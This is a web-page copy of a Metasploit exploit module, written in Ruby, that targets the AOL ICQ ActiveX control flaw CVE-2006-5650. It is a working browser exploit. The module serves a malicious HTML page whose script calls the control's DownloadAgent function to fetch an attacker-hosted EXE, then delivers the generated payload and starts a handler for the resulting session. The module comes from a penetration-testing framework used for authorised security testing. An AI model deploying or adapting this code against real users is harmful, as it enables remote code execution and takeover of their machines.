Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/aol_icq_downloadagent.rb
58066 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',

17
        'Description' => %q{

18
          This module allows remote attackers to download and execute arbitrary files

19
          on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [ 'MC' ],

23
        'References' => [

24
          [ 'CVE', '2006-5650' ],

25
          [ 'OSVDB', '30220' ],

26
          [ 'BID', '20930' ],

27
          [ 'ZDI', '06-037' ],

28
        ],

29
        'Payload' => {

30
          'Space' => 2048,

31
          'StackAdjustment' => -3500,

32
        },

33
        'Platform' => 'win',

34
        'Targets' => [

35
          [ 'Automatic', {} ],

36
        ],

37
        'DisclosureDate' => '2006-11-06',

38
        'DefaultTarget' => 0,

39
        'Notes' => {

40
          'Reliability' => UNKNOWN_RELIABILITY,

41
          'Stability' => UNKNOWN_STABILITY,

42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

43
        }

44
      )

45
    )

46


47
    register_options(

48
      [

49
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])

50
      ]

51
    )

52
  end

53


54
  def autofilter

55
    false

56
  end

57


58
  def check_dependencies

59
    use_zlib

60
  end

61


62
  def on_request_uri(cli, request)

63
    payload_url = "#{get_uri(cli)}/PAYLOAD"

64


65
    if (request.uri.match(/PAYLOAD/))

66
      return if ((p = regenerate_payload(cli)) == nil)

67


68
      data = generate_payload_exe({ :code => p.encoded })

69
      print_status("Sending EXE payload")

70
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

71
      return

72
    end

73


74
    vname = rand_text_alpha(rand(100) + 1)

75
    exe = rand_text_alpha_upper(rand(5) + 1)

76


77
    content = %Q|

78
  <html>

79
    <head>

80
      <script>

81
        try {

82
          var #{vname} = new ActiveXObject('ICQPhone.SipxPhoneManager.1');

83
          #{vname}.DownloadAgent("#{payload_url}/#{exe}.exe");

84
        } catch( e ) { window.location = 'about:blank' ; }

85
      </script>

86
    </head>

87
  </html>

88
        |

89


90
    print_status("Sending exploit...")

91


92
    send_response_html(cli, content)

93


94
    handler(cli)

95
  end

96
end

97


98